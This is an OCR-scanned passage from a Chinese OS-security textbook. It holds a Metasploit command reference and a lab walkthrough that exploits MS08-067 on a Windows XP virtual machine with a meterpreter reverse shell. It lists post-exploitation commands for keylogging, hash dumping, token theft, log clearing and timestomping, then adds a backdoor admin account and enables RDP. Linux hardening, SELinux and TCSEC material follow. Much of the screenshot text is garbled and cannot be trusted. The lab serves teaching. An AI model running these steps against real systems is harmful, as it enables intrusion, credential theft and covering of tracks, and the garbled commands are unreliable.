列 出 metasploit 框架 中 的 所 有 辅助 攻击 载荷 


search name 


查找 metasploit 框架 中 所 有 的 渗透 攻击 和 其 他 模块 


info 展示 出 制定 渗透 攻击 或 模块 的 相关 信息 

use name 装载 一 个 渗透 攻击 或 模块 

UN 本 地 可 以 让 目标 主机 连接 的 TP 地 址 ,通常 当 目标 主机 不 在 同一 个 局 
域 网 内 时 ,就 需要 是 一 个 公共 IP 地 址 ,特别 为 反弹 式 Shell 使 用 

RHOST 远程 主机 或 是 目标 主机 


set function 


设置 特定 的 配置 参数 (EG: 设置 本 地 或 远程 主机 参数 ) 


setg function 


以 全 局 方式 设置 特定 的 配置 参数 (EG: 设置 本 地 或 远程 主机 参数 ) 


show options 


列 出 某 个 渗透 攻击 或 模块 中 所 有 的 配置 参数 


show targets 列 出 渗透 攻击 所 有 支持 的 目标 平台 

set target num 指定 所 知道 的 目标 的 操作 系统 以 及 补丁 版 本 类 型 
set payload name 指定 想 要 使 用 的 攻击 载荷 

show advanced 列 出 所 有 高 级 配置 选项 


set autorunscript migrate -f 


在 渗透 攻击 完成 后 ,将 自动 迁移 到 另 一 个 进程 


check 检测 目标 是 否 选 定 渗透 攻击 存在 相应 的 安全 漏洞 
exploit 执行 渗透 攻击 或 模块 来 攻击 目标 

exploit -j 在 计划 任务 下 进行 渗透 攻击 (攻击 将 在 后 台 进 行 ) 
exploit -z 渗透 攻击 完成 后 不 与 回话 进行 交互 


exploit -e encoder 


制定 使 用 的 攻击 载荷 编码 方式 (EG: exploit -e shikata_ga_nai) 


exploit -h 列 出 exploit 命令 的 帮助 信息 

sessions -l 列 出 可 用 的 交互 会 话 ( 在 处 理 多 个 Shell 时 使 用 ) 

sessions -l -v 列 出 所 有 可 用 的 交互 会 话 及 详细 信息 

sessions -s script 在 所 有 活跃 的 metasploit 会 话 中 运行 一 个 特定 的 metasploit 脚本 
sessions -K 杀 死 所 有 活跃 的 交互 会 话 


sessions -c cmd 


在 所 有 活跃 的 metasploit 会 话 上 执行 一 个 命令 


sessions -u sessionID 


升级 一 个 普通 的 Win32 Shell 到 metasploit Shell 
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第 2 步 : 如 图 4-3 所 示 , 运 行 search netapi 命令 搜索 netapi. TE metasploit 框架 中 列 出 


所 有 与 netapi 相关 的 漏洞 利用 代码 。 


[ns > search netapi 


Matching Modules 


Name Disclosure Date Rank — Description 
Gxploit/windows/smb/es03 (49 netapi 2003-11-11 good 。 MS03.049 Microsoft Workstation Service NethddAlternateConputerlame Overflow) 
exploit/windows/snb/ms06 040 netapi 2006-08-08 good 。 MSO6-040 Microsoft Server Service NetpwPathCanonicalize Overflow 
exploit/windows/snb/ms06.070 wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManagelPCConnect Overflow 
exploit/windows/snb/ms0B 067 netapi 2008-10-28 Great — MS08-067 Microsoft Server Service Relative Path Stack Corruption 


Inst > use exploit vindows/ snb/ ns08- 067. retapi 
[nsf oxploit(ms08.067. netapl) > show payloads 


normal Generic x86 Debug Trap 
generic/shell bind tcp normal Generic Command Shell, Bind TCP Inline. 


图 4-3 与 netapi 相关 的 漏洞 利用 代码 
从 列 出 的 结果 上 看 ,最 后 一 个 漏洞 利用 代码 的 评级 为 great, 所 以 优先 使 用 ms08_067 


漏洞 利用 代码 。 


第 3 步 : 如 图 4-3 所 示 , 输 入 命令 : use exploit/windows/smb/ms08_067_netapi。 
其 中 ,ms08_067 是 微软 漏洞 发 布 时 候 对 漏洞 进行 的 编号 ,意思 就 是 告诉 公众 这 个 漏洞 


是 2008 年 第 67 个 漏洞 。 
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msf exploit(ms08_067_netapi) > show targets // 可 以 查看 攻击 平台 
msf exploit(ms08_067_netapi) > show options // 查 看 整个 攻击 需要 设置 哪些 参数 


第 4 步 : 依次 执行 如 下 命令 ,具体 过 程 如 图 4-4 所 示 。 


[nat expoitias08.067 netapi) > set most 192. 168.201. 135 
rhost => 192. 1 


top 和 > check 
- The target is vulnerable. 

Inst. netapi) > set paylod windows/meterpreter/ reverse, tcp aliports 

|paytod => windows/materpreter/ reversa. tcp. allports 

[nsf exploit(ms08.067.netapl) > exploit 


|[* Started reverse handler on 192.168.201. 133: 4444 
i$] Automatically detecting tho target... 

|[*I Fingerprint: Windows XP - Service Pack 0 / 1 lang: Chinese - Traditional 
[*] Selected Target: Windows XP SPO/SP! Universal 

[*] Attempting to trigger the vulnerability. 

|[*] Sending stage (885806 bytes) to 192.168.201. 
[1 Meterpreter sesion 1 opens (192 168.201. 1334444 -> 192.168.201. 135: 1032) at 2015-08-13 16:02:38 +0800 


> shett 
Process 1840 croatod. 

Channel 1 created. 

Microsoft Windows X? [€ 5.1.2600] 
C) 46:449 1985-2001 Microsoft Corp. 


(C: \WINDOWS\ syst on32> 


图 4-4 执行 多 条 命令 


msf exploit(ms08_067_netapi) > set rhost 192.168.201.135 

// 设 置 目 标 主机 IP 地 址 

msf exploit(ms08 067 netapi) > check 

// 设 置 目标 主机 TP 地 址 

msf exploit(ms08_067_netapi) > show payloads 

// 列 出 所 有 可 以 使 用 的 攻击 载荷 

msf exploit(ms08 067 netapi) > set paylod windows/meterpreter/reverse tcp allports 
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// 设 置 攻击 载荷 


msf exploit(ms08 067 netapi) > exploit 
// 运 行 exploit 命令 实施 攻击 ,如 果 攻 击 成 功 , 会 获得 一 个 session, 可 以 使 用 Msf 的 meterpreter 模 


块 来 进一步 操作 


在 “meterpreter 盖 ”命令 行 提 示 符 后 面 可 以 使 用 的 主要 命令 见 表 4-2。 


表 4-2 "meterpreter ”命令 行 提示 符 后 面 可 以 使 用 的 主要 命令 
命 + 作 用 
help 列 出 meterpreter 所 有 可 以 使 用 的 命令 
sysinfo 列 出 受 控 主 机 的 系统 信息 
ipconfig 查看 受 控 主 机 的 ip 信息 
shell 获取 受 控 主 机 的 Shell 
Teboot 重启 目标 主机 


run scriptname 


运行 meterpreter 脚本 ,在 scripts/meterpreter 目录 下 可 查看 
所 有 脚本 名 


1s 


列 出 目标 主机 的 文件 和 文件 夹 信息 


use priv 加 载 特权 提升 扩展 模块 ,来 扩展 metasploit 库 
ps 显示 所 有 运行 的 进程 以 及 相关 联 的 用 户 账户 

迁移 到 一 个 指定 的 进程 IDCPID 号 可 通过 ps 命令 从 主机 上 获 
migrate PID 


得 ) 


use incognito 


加 载 incognito 功能 (用 来 盗窃 目标 主机 的 令 牌 或 假冒 用 户 ) 


list_tokens -u 列 出 目标 主机 用 户 的 可 用 令 牌 

list tokens -g 列 出 目标 主机 用 户 组 的 可 用 令 牌 
impersonate. token DOMAIN. NAME - 

AUSERNAME 假冒 目标 主机 上 的 可 用 令 牌 

steal token PID 盗窃 给 定 进程 的 可 用 令 牌 并 进行 令 牌 假冒 
drop. token 停止 假冒 当前 令 牌 

getsystem 通过 各 种 攻击 向 量 来 提升 系统 用 户 权 限 


execute -f cmd. exe -i 


执行 cmd. exe 命令 并 进行 交互 


execute -f cmd. exe -i -t 


以 所 有 可 用 令 牌 来 执行 cmd 命令 并 隐藏 该 进程 


rev2self 


回 到 控制 目标 主机 的 初始 用 户 账户 下 


reg command 


在 目标 主机 注册 表 中 进行 交互 ,创建 \ 删 除 、 查 询 等 操作 


setdesktop number 


切换 到 另 一 个 用 户 界面 (该 功能 基于 那些 用 户 已 登录 ) 


screenshot 对 目标 主机 的 屏幕 进行 截图 

upload file 向 目标 主机 上 传 文件 

download file 从 目标 主机 下 载 文 件 

keyscan_start 针对 远程 目标 主机 开启 键盘 记录 功能 
keyscan_dump 存储 目标 主机 上 捕获 的 键盘 记录 
keyscan_stop 停止 针对 目标 主机 的 键盘 记录 
getprivs 尽 可 能 多 地 获取 目标 主机 上 的 特权 
uictl enable keyboard/mouse 接管 目标 主机 的 键盘 和 鼠标 
background 将 你 当前 的 metasploit Shell 转 为 后 台 执 行 
hashdump 导出 目标 主机 中 的 口令 哈 希 值 

use sniffer 加 载 嗅 探 模式 
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续 表 
命 + 作 用 
sniffer interfaces 列 出 目标 主机 所 有 开放 的 网 络 端口 
sniffer_dump interfaceID pcapname 在 目标 主机 上 启动 嗅 探 
sniffer start interfaceID packet-buffer 在 目标 主机 上 针对 特定 范围 的 数据 包 缓冲 区 启动 嗅 探 
sniffer stats interfaceID 获取 正在 实施 嗅 探 网 络 接口 的 统计 数据 
sniffer stop interfaceID 停止 嗅 探 
clearev 清楚 目标 主机 上 的 日 志 记录 
timestomp 修改 文件 属性 ,例如 修改 文件 的 创建 时 间 ( 反 取证 调查 ) 


第 5 步 : 依次 执行 如 下 命令 ,具体 过 程 如 图 4-5 所 示 。 


C:\WINDOWS\ system32 > net user ztg 123456 /add 

// 添 加 一 个 用 户 名 为 ztg, 密码 为 123456 

C:\WINDOWS\system32 > net localgroup administrators ztg /add 

// 把 ztg 添加 到 管理 员 组 

C:\WINDOWS\ system32 > REG ADD HKLMN SYSTEMN CurrentControlSet \ Control \ Terminal" "Server /v 
fDenyTSConnections /t REG DWORD /d 0 /f 

// 手 动 开启 3389( 远 程 桌面 连接 端口 ) 


[EVDows eystordz»net usor zig 123456 [add T 
net user ztg 1234: 
tt tt——À 


(c: WINDONSVsystend2»net localgrouo administrators ztg /add 
[net tocatgroup administrators ztg /add | 
[99909 corto 


eo sreesint jo PRLI SYSTEM Currie toner Terminai”. “Sarvar jv ppracomctam (t o /ao | 
RE PS 


ton32netstat -an 


adress foreign a E 

S aooo tistem 

Saas $0.60 LISTENING 

5 0s 0.0.0.0: 0 LSTENINS 

5:010 $0.50 LISTENING 

2.0.0.0: 0 LISTENING 

Ex 8.0.0.0: 0 STEM s 
图 
4-5 用 户 管理 


第 6 步 : 在 宿主 机 Windows 7 中 启用 VMnet8, 如 图 4-6 所 示 。 这 样 , 宿 主机 和 虚拟 机 
同属 于 一 个 网 段 ,本 实验 是 192. 168. 201. 因此 宿主 机 (Windows 7) 能 够 访问 虚拟 机 
(Windows XP), 


Oane samage sanee ë Resten  BEmSEDUS Sunenom — Se (3 | 


Bluetooth BEE VirtualBox Host-Only Network VirtualBox Host-Only Network 
eem d s 


2 
Bluetooth 设备 {个 人 区 类 网 ) PF VirtualBox Host-Only Ethernet — C FBS 
Si VMware Network Adapter 
we 


as um 


图 4-6 启用 VMnet8 
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第 7 步 : 在 宿主 机 Windows 7 中 ,依次 选择 “开始 ”>“ 附 件 ”>“ 远 程 桌面 连接 ”命令 , 打 
开 的 对 话 框 如 图 4-7 所 示 ,输入 目标 机 的 IP 地 址 (192. 168. 201. 135) 和 用 户 名 (ztg) , 单 击 
“连接 ”按钮 ,成 功 获得 目标 机 的 桌面 ,如 图 4-8 所 示 。 

这 次 人 侵 成 功 ,是 由 于 目标 机 没有 针对 netapi 漏洞 进行 补丁 修复 。 因 此 ,对 于 计算 机 
用 户 来 说 ,需要 及 时 为 系统 打 补 丁 ,确保 漏洞 不 被 恶意 攻击 者 利用 。 


E 192.168.201.135 - 远程 桌面 连接 i 
€ 


RA “| 显示 “| 本 地 资源 [程序 | 体验 | 高 级 | 
登录 设置 
LL" 输入 远程 计算 机 的 名 称 。 
VERLO: 192. 168.201.135 - 


用 户 名 Eri 
i fristieR Aron CsiBIio] HR o 
IH fevrdi 8 ER QD 


连接 设置 
fossmomans RDP 文件 或 打开 一 个 已 保存 的 连 


CRO J[st5o. | CARO.. ] 


CEL 


图 4-7 远程 桌面 连接 图 4-8 Windows 桌面 效果 


45 实例 : Linux 系 统 安 全 配置 


对 于 公认 的 具有 很 高 稳定 性 的 Linux 操作 系统 来 说 ,如 果 没 有 很 好 的 安全 设置 ,那么 也 
会 较 容易 地 被 网 络 黑客 入 侵 。 下 面 从 账号 安全 管理 、 存 取 访 问 控制 ,资源 安全 管理 和 网 络 安 
全 管理 4 个 方面 对 Linux 系统 的 安全 设置 进行 初步 .简单 的 介绍 。 

本 节 介 绍 的 内 容 基 于 Redhat Linux/CentOS/Fedora。 


4.5.1 账号 安全 管理 


1. 使 用 su、sudo 命令 

由 于 root 用 户 具 有 最 高 权限 ,如 果 对 这 种 权限 进行 滥用 ,会 将 系统 暴露 在 无 法 预测 的 
安全 威胁 之 下 ,会 带 来 不 必要 的 损失 ,因此 不 要 轻易 将 root 用 户 权 限 授权 出 去 。 但 是 有 些 
时 候 需 要 使 用 root 用 户 权限 对 一 些 程序 进行 安装 和 维护 ,此 时 可 以 使 用 su 命令 。 运 行 su 
命令 ,输入 正确 的 root 密码 ,就 可 以 暂时 使 用 root 权限 进行 操作 了 。 当 需要 授权 其 他 用 户 
以 root 身份 运行 某 些 命令 时 ,可 以 使 用 sudo 命令 。 

2. 删除 所 有 的 特殊 账户 

为 了 减少 系统 的 安全 隐患 ,最 好 删除 不 用 的 默认 用 户 账户 和 组 账户 ,比如 games, 
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gopher,halt,lp,news,operator, shutdown,sync 等 。 

3. 修改 默认 密码 长 度 

首先 要 确定 系统 中 不 存在 空 口令 ,然后 要 修改 默认 密码 长 度 , 编 辑 /etc/login. defs X 
件 ,把 PASS MIN LEN 5( 默 认 密 码 长 度 是 5 个 字符 ) 改 为 PASS_MIN_LEN 8( 或 更 长 ) 。 

4. 修改 口令 文件 属性 

执行 如 下 命令 修改 口令 文件 属性 ,可 以 防止 对 这 些 文件 的 任何 修改 。 

# chattr + i /etc/passwd 

# chattr + i /etc/shadow 

# chattr + i /etc/group 

# chattr + i /etc/gshadow 

注意 : 具有 i 属性 的 文件 不 能 被 改动 , 即 不 能 删除 、 不 能 重 命名 \、 不 能 向 这 个 文件 里 写 数 
据 、 不 能 创建 该 文件 的 链接 。 


4.5.2 存 取 访问 控制 


Linux 系统 中 的 每 个 文件 和 目录 都 有 访问 许可 权限 ,可 以 使 用 它 来 确定 某 个 用 户 可 以 
通过 某 种 方式 对 文件 或 目录 进行 操作 。 文 件 或 目录 的 访问 权限 分 为 可 读 、 可 写 和 可 执行 
3 种 。 文 件 在 创建 时 会 自动 把 该 文件 的 读 写 权 限 分 配给 其 属 主 , 使 用 户 能 够 显示 和 修改 该 
文件 。 也 可 以 将 这 些 权限 改变 为 其 他 的 组 合 形式 。 一 个 文件 若 有 执行 权限 , 则 允许 它 作为 
一 个 程序 被 执行 。 文 件 的 访问 权限 可 以 用 chmod 命令 来 重新 设 定 。 

访问 控制 决定 用 户 可 以 访问 哪些 文件 ,以 及 对 这 些 文件 可 以 进行 的 操作 。 

访问 者 可 以 分 为 3 类 : 文件 拥有 者 (u) 、 同 组 用 户 (g) 和 其 他 用 户 (0)。 

访问 类 型 可 以 分 为 3 种 : 读 (r)、 写 (w) 和 执行 (x) ,可 以 组 合成 9 个 不 同 权限 。 

文件 和 目录 的 属性 决定 了 文件 和 目录 的 被 许可 权限 。 使 用 命令 ls-1 将 显示 文件 的 属 
性 ,比如 文件 的 类 型 以 及 文件 的 9 个 权限 位 (前 3 个 权限 位 被 称 为 拥有 者 三 元 组 ,中 间 3 个 
权限 位 被 称 为 同 组 用 户 三 元 组 ,后 3 个 权限 位 被 称 为 其 他 用 户 三 元 组 ) 。 通 过 这 种 方法 来 对 
文件 的 许可 权限 进行 管理 ,系统 根据 每 个 文件 的 许可 权限 来 判断 每 个 用 户 能 够 对 每 个 文件 
进行 的 操作 。 在 整个 系统 中 超级 用 户 , 即 root 用 户 不 受 限 于 这 种 限制 , 它 可 以 更 改 任 何 一 
个 文件 的 许可 权限 。 普 通用 户 只 能 够 使 用 chmod 命令 更 改 属 于 自己 的 文件 和 目录 的 许可 
权限 。 

除了 读 (r) 、 写 (w) 和 执行 (x)3 种 许可 权限 外 ,还 有 两 种 特别 的 权限 : s 和 +t。 

s 位 出 现在 拥有 者 三 元 组 或 同 组 用 户 三 元 组 的 第 3 位 , 即 x 位 ,表示 此 文件 是 可 执行 文 
件 , 并 且 在 该 文件 执行 时 ,将 以 文件 拥有 者 的 ID 或 组 拥有 者 ID 运行 ,而 不 是 以 运行 命令 的 
用 户 的 ID 运行 。 可 执行 脚本 被 置 s 位 ,存在 一 种 潜在 的 危险 ,特别 是 文件 拥有 者 或 组 拥有 
者 是 root 用 户 时 。 

t 位 出 现在 其 他 用 户 三 元 组 的 第 3 位 ,如 果 在 目录 的 其 他 用 户 三 元 组 中 指定 了 执行 和 
可 写 许可 权限 ,任何 用 户 都 可 以 删除 或 修改 该 目录 中 的 任何 文件 ,使 用 t 权限 可 以 防止 用 户 
删除 或 修改 目录 中 的 文件 。 

例如 : 执行 # chmod -R 700 /etc/rc. d/init. d/ * 命令 ,修改 /etcyrc. d/init. d/ 目 录 中 
脚本 文件 的 许可 权限 ,表示 只 有 root 用 户 才 可 以 读 、 写 或 执行 该 目录 下 的 脚本 文件 。 
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4.5.3 资源 安全 管理 


1. 保护 关键 分 区 

在 Linux 系统 中 ,可 以 将 不 同 的 应 用 安装 在 不 同 的 分 区 上 ,每 个 分 区 分 别 进行 不 同 的 配 
置 , 可 以 将 关键 分 区 设置 为 只 读 , 这 样 可 以 大 大 提高 Linux 文件 系统 的 安全 。Linux 文件 系 
统 可 以 分 为 几 个 主要 的 分 区 ,一 般 情 况 下 至 少 需要 建立 /boot Vlib /sbin /usr/local,/var 
和 /home 等 分 区 。 

/usr 可 以 安装 成 只 读 ,并 且 可 以 被 认为 是 不 可 修改 的 ,如 果 /usr 中 有 任何 文件 发 生 了 
改变 ,那么 系统 将 立即 发 出 安全 报警 。 

/boot、/lib 和 /sbin 的 安装 和 设置 也 一 样 ,在 安装 时 尽量 将 它们 设 为 只 读 。 

不 过 有 些 分 区 是 不 能 设 为 只 读 的 ,比如 /var。 

2. 保护 文件 

在 ext3 文件 系统 中 有 “不 可 变 ”" 和 “只 添加 ”这 两 种 文件 属性 ,使 用 这 些 属性 可 以 进一步 
提高 文件 的 安全 级 别 。 标 记 为 “不 可 变 ” 的 文件 不 能 被 修改 , 根 用 户 也 不 能 修改 。 标 记 为 “只 
添加 ”的 文件 可 以 被 修改 ,但 是 只 能 在 它 的 后 面 添加 新 内 容 , 根 用 户 也 是 如 此 。 可 以 使 用 
lsattr 命令 查看 这 些 属性 ,可 以 使 用 chattr 命令 来 修改 文件 的 这 些 属性 。 

比如 系统 管理 员 可 以 将 log 文件 属性 设置 为 “只 添加 ”。 


4.5.4 网 络 安全 管理 


1. 取消 不 必要 的 服务 

Linux 中 有 两 种 服务 类 型 : 一 种 是 仅 在 有 需要 时 才 执 行 的 服务 ; 另 一 种 是 一 直 在 执行 
的 服务 。 

(1) 需要 时 才 执 行 的 服务 。 早 期 的 Linux 版 本 中 ,每 一 个 不 同 的 网 络 服务 都 有 一 个 服 
务 程序 在 后 台 运 行 ,现在 的 版 本 用 统一 的 xinetd 服务 器 程序 担 此 重任 。xinetd(eXtended 
InterNET services Daemon) 被 称 为 “扩展 的 超级 服务 器 ”( 之 前 是 inetd) ,其 作用 是 根据 网 络 
请 求 装 入 网 络 程序 。xinetd 同时 监视 多 个 网 络 端口 ,一 旦 接收 到 外 界 传 来 的 连接 信息 ,就 执 
行 相应 的 TCP 或 UDP 网 络 服务 。 要 取消 不 必要 的 服务 ,可 以 修改 /etc/xinetd. conf 文件 。 

(2) 一 直 在 执行 的 服务 。 这 类 服务 在 系统 启动 时 就 开始 执行 ,需要 修改 /etc/rc. d/ 
rc[ n]. d/ 中 的 文件 ,比如 提供 文件 服务 的 NFS 服务 器 和 提供 NNTP 新 闻 服 务 的 news 服务 
器 都 属于 这 类 服务 ,如 果 没 有 必要 ,最 好 将 这 些 服务 取消 。 

(3) /etc/services, /etc/services 文件 使 得 服务 器 和 客户 端的 程序 能 够 将 服务 的 名 字 
转 成 端口 号 ,只 有 root 用 户 才 有 权 修 改 这 个 文件 ,而 且 通 常情 况 下 这 个 文件 是 没有 必要 修 
改 的 ,因为 这 个 文件 中 已 经 包含 了 常用 的 服务 所 对 应 的 端口 号 。 为 了 提高 安全 性 ,可 以 执行 
# chattr +i /etc/services 命令 ,避免 该 文件 未 经 授权 地 被 删除 和 修改 。 

2. 隐藏 系统 信息 

默认 情况 下 ,登录 提示 信息 包括 Linux 发 行 版 的 名 称 、 版 本 、 内 核 版 本 和 主机 名 等 信息 ， 
这 些 信 息 对 于 黑客 人 侵 是 很 有 帮助 的 .因此 .出 于 服务 器 的 安全 考虑 ,需要 将 这 些 信息 修改 
或 注释 掉 。 应 该 只 显示 一 个 “login: ”提示 符 。 

操作 时 删除 /etc/issue 和 /etc/issue. net 文件 中 的 内 容 即 可 。 
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/etc/issue 文件 是 用 户 从 本 地 登录 时 看 到 的 提示 。 

/etc/issue. net 文件 是 用 户 从 网 络 登录 (如 telnet、ssh) 系 统 时 看 到 的 登录 提示 。 

3. 登录 终端 设置 

TE / etc/securetty 文件 指定 了 允许 root 用 户 登 录 的 tty 设备 ,由 /bin/login 程序 读 取 , 其 
格式 是 一 个 被 允许 的 名 字 列 表 , 可 以 编辑 /etc/securetty 且 注 释 掉 如 下 所 示 的 行 ， 

ttyl 

# tty2 

# tty3 

这 样 ,root 用 户 只 能 在 ttyl 终端 登录 。 

4. tcp_wrappers 

可 以 使 用 tcp_wrappers 来 阻止 一 些 外 部 人 侵 。 最 好 的 策略 就 是 先 阻 止 所 有 的 主机 , 然 
后 再 建立 允许 访问 该 系统 的 主机 列表 。 

首先 编辑 /etc/hosts. deny 文件 ,加 入 ALL: ALL@ALL, PARANOID。 

然后 编辑 /etc/hosts. allow 文件 ,加 入 允许 访问 的 主机 列表 ,比如 ,ftp: 202. 196. 0. 101 
ztg. edu. com,202. 196. 0. 101 是 允许 访问 ftp 服务 的 IP 地 址 ,ztg. edu. com 是 允许 访问 ftp 
服务 的 主机 名 。 

最 后 使 用 tcpdchk 命令 检查 tep wrapper 的 设置 是 否 正确 。 

5. 定期 检查 系统 中 的 日 志 

(D /var/log/messages 日 志文 件 。 检 查 /var/log/messages 日 志文 件 , 查 看 外 部 用 户 的 
登录 情况 。 

(2) history 文件 。 检 查 用 户主 目录 (/home/username) 下 的 历史 文件 , 即 “. history" 
文件 。 

6. 防止 ping 

TE / etc/ rc. d/rc. local 文件 增加 : echo 1 > /proc/sys/net/ipv4/icmp. echo. ignore all. 
防止 别人 ping 自己 的 系统 ,从 而 增加 系统 的 安全 性 。 

7. 防 IP 欺骗 

在 /etc/host. conf 文件 中 增加 一 行 : nospoof on, 防 止 IP 欺骗 。 

其 他 内 容 包 括 使 用 ssh 远程 登录 Linux 系统 ; 删除 或 禁用 r FAMO: 使 用 防火 墙 , 防 
止 网 络 攻击 。 另 外 ,可 以 使 用 表 4-3 中 的 命令 对 系统 进行 系统 安全 检查 。 


表 4-3 系统 安全 检查 命令 及 其 功能 


命令 功 能 
finger 查看 所 有 的 登录 用 户 
history 显示 系统 过 去 被 运行 的 命令 
last 显示 系统 曾经 被 登录 的 用 户 和 TTYS 
netstat 可 以 查看 现在 的 网 络 状态 
top 动态 实时 查看 系统 的 进程 
who,w 查看 登录 到 系统 中 的 用 户 
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46 Linx 自 主 访问 控制 与 强制 访问 控制 


安全 系统 在 原 有 Linux 操作 系统 基础 上 ,新 增 了 强制 访问 控制 .最 小 特权 管理 .可 信 路 
径 、 隐 通道 分 析 和 加 密 卡 支持 等 功能 ,系统 的 主要 功能 如 下 。 

1. 标识 与 鉴别 

标识 与 鉴别 包括 角色 管理 .用 户 管理 和 用 户 身 份 鉴别 三 个 部 分 。 

2. 自主 访问 控制 

本 系统 在 自主 访问 控制 中 加 入 了 ACL 机 制 。 

3. 强制 访问 控制 

提供 基于 数据 保密 性 的 资源 存 取 控制 方法 ,提供 了 比 DAC 更 严格 的 访问 约束 。 

4. SELinux 

传统 Linux 的 不 足 : 存在 特权 用 户 root, 对 于 文件 的 访问 权 的 划分 不 够 细 ,SUID 程序 
的 权限 升级 ,DAC(Discretionary Access Control) 问题 。 对 于 这 些 不 足 , 防 火 墙 和 入 侵 检测 
系统 都 无 能 为 力 。 在 这 种 背景 下 ,出现 了 SELinux, 

SELinux(Security Enhanced Linux) 是 美国 国家 安全 局 CNAS) 对 于 强制 访问 控制 
(MAC) 的 一 种 实现 ,在 这 种 强制 访问 控制 体系 下 ,进程 只 能 访问 那些 在 它 的 任务 中 所 需要 
的 文件 。SELinux 在 类 型 强制 服务 器 中 合并 了 多 级 安全 性 或 一 种 可 选 的 多 类 策略 ,并 采用 
了 基于 角色 的 访问 控制 概念 。 

目前 的 多 数 Linux 发 行 版 ,如 Fedora、RHEL、CentOS、Debian 或 Ubuntu 等 ,都 在 内 核 
中 启用 了 SELinux, 并 且 提 供 了 一 个 可 定制 的 安全 策略 ,还 提供 很 多 用 户 层 的 库 和 工具 ,用 
来 帮助 用 户 使 用 SELinux 的 功能 。 

SELinux 系统 比 起 通常 的 Linux 系统 来 ,安全 性 能 要 高 得 多 , 它 通过 对 用 户 、 进 程 权 限 
的 最 小 化 ,即使 受到 攻击 ,进程 或 者 用 户 权 限 被 夺 去 ,也 不 会 对 整个 系统 造成 重大 影响 。 


# setenforce 1 //i& t SELinux 为 enforcing 模式 
# setenforce 0 // 设 置 SELinux 为 permissive 模式 
# sestatus // 查 看 系统 中 SELinux 目前 的 状态 


注意 : 5 SELinux 有 关 的 主要 操作 有 : ls -Z、ps -Zid -Z 等 ,这 几 个 命令 的 -Z 参数 专用 
于 SELinux, 可 以 查看 文件 .进程 和 用 户 的 SELinux 属性 。 命令 chcon 用 来 改变 文件 的 
SELinux 属性 。 


47 安全 等 级 标准 


下 面 介绍 几 种 信息 安全 评估 标准 : ISO 安全 体系 结构 标准 .美国 可 信 计 算 机 安全 评价 
标准 、 中 国 国家 标准 《计算 机 信息 安全 保护 等 级 划分 准则 》。 
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4.7.1 ISO 安全 体系 结构 标准 


在 安全 体系 结构 方面 ,ISO 制定 了 国际 标准 ISO 7498-2 一 1989《 信 息 处 理 系统 开放 系统 
互联 基本 参考 模型 第 2 部 分 安全 体系 结构 》。 该 标准 为 开放 系统 互 连 (OSI) 描述 了 基本 参 
考 模型 ,为 协调 开发 现 有 的 与 未 来 的 系统 互联 标准 建立 起 了 一 个 框架 。 其 任务 是 提供 安全 
服务 与 有 关机 制 的 一 般 描述 ,确定 在 参考 模型 内 部 可 以 提供 这 些 服务 与 机 制 的 位 置 。 


4.7.2 美国 可 信 计 算 机 安全 评价 标准 


20 世纪 80 年 代 , 美 国 国防 部 根据 军用 计算 机 系统 的 安全 需要 ,制定 了 《可 信 计 算 机 系 
统 安全 评价 标准 》(Trusted Computer System Evaluation Criteria, TCSEC) , 

TCSEC 标准 是 计算 机 系统 安全 评估 的 第 一 个 正式 标准 ,具有 划时代 的 意义 。 该 准则 于 
1970 年 由 美国 国防 科学 委员 会 提出 ,并 于 1985 年 12 月 由 美国 国防 部 公布 。TCSEC 最 初 
只 是 军用 标准 ,后 来 延至 民用 领域 。TCSEC 将 计算 机 系统 的 安全 划分 为 4 个 等 级 、7 个 
级 别 。 

其 中 对 操作 系统 安全 级 别 的 划分 见 表 4-4。 


表 4-4 操作 系统 安全 级 别 


级 别 系统 的 安全 可 信人 性 

D 最 低 安全 

C1 自主 存 取 控制 

C2 较 完善 的 自主 存 取 控制 (DAC) 

Bl 强制 存 取 控 制 (MAC) 

B2 良好 的 结构 化 设计 形式 化 安全 模型 
B3 全 面 的 访问 控制 ,可 信 恢 复 

A 形式 化 认证 (最 高 安全 ) 


D 类 安全 等 级 : D 类 安全 等 级 只 包括 D1 一 个 级 别 。D1 的 安全 等 级 最 低 。D1 系统 只 
为 文件 和 用 户 提供 安全 保护 。D1 系统 最 普通 的 形式 是 本 地 操作 系统 ,或 者 是 一 个 完全 没有 
保护 的 网 络 。 

C 类 安全 等 级 : 该 类 安全 等 级 能 够 提供 审慎 的 保护 ,并 为 用 户 的 行动 和 责任 提供 审计 
能 力 。C 类 安全 等 级 可 划分 为 Cl 和 C2 两 类 。 

C1 系统 的 可 信任 运算 基础 体制 (Trusted Computing Base,TCB) 通 过 将 用 户 和 数据 分 
开 来 达到 安全 的 目的 。 在 CI 系统 中 ,所 有 的 用 户 以 同样 的 灵敏 度 来 处 理 数 据 , 即 用 户 认为 
C1 系统 中 的 所 有 文档 都 具有 相同 的 机 密 性 。 

C2 系统 比 Cl 系统 加 强 了 可 调 的 审慎 控制 。 在 连接 到 网 络 上 时 ,C2 系统 的 用 户 分 别 对 
各 自 的 行为 负责 。C2 系统 通过 登录 过 程 、 安 全 事件 和 资源 隔离 来 增强 这 种 控制 。C2 系统 
具有 C1 系统 中 所 有 的 安全 性 特征 。 

B 类 安全 等 级 : B 类 安全 等 级 可 分 为 Bl1、B2 和 B3 三 类 。B 类 系统 具有 强制 性 保护 功 
能 。 强 制 性 保护 意味 着 如 果 用 户 没有 与 安全 等 级 相连 ,系统 就 不 会 让 用 户 存 取 对 象 。 

B1 系统 满足 的 要 求 有 : 系统 对 网 络 控 制 下 的 每 个 对 象 都 进行 灵敏 度 标记 ; 系统 使 用 灵 
102 


第 4 章 ”操作 系统 安全 技术 


敏 度 标记 作为 所 有 强迫 访问 控制 的 基础 ; 系统 在 把 导入 的 、 非 标记 的 对 象 放 入 系统 前 标记 
好 ; 灵敏 度 标记 必须 准确 地 表示 其 所 联系 的 对 象 的 安全 级 别 ; 当 系 统管 理 员 创建 系统 或 者 
增加 新 的 通信 通道 或 IO 设备 时 ,管理 员 必 须 指定 每 个 通信 通道 和 1/O 设备 是 单 级 还 是 多 
级 ,并 且 管 理 员 只 能 手工 改变 指定 ; 单 级 设备 并 不 保持 传输 信息 的 灵敏 度 级 别 ; 所 有 直接 
面向 用 户 位 置 的 输出 (无 论 是 虚拟 的 还 是 物理 的 ?都 必须 产生 标记 来 指示 关于 输出 对 象 的 灵 
敏 度 ; 系统 必须 使 用 用 户 的 口令 或 证 明 来 决定 用 户 的 安全 访问 级 别 ; 系统 必须 通过 审计 来 
记录 未 授权 访问 的 企图 。 

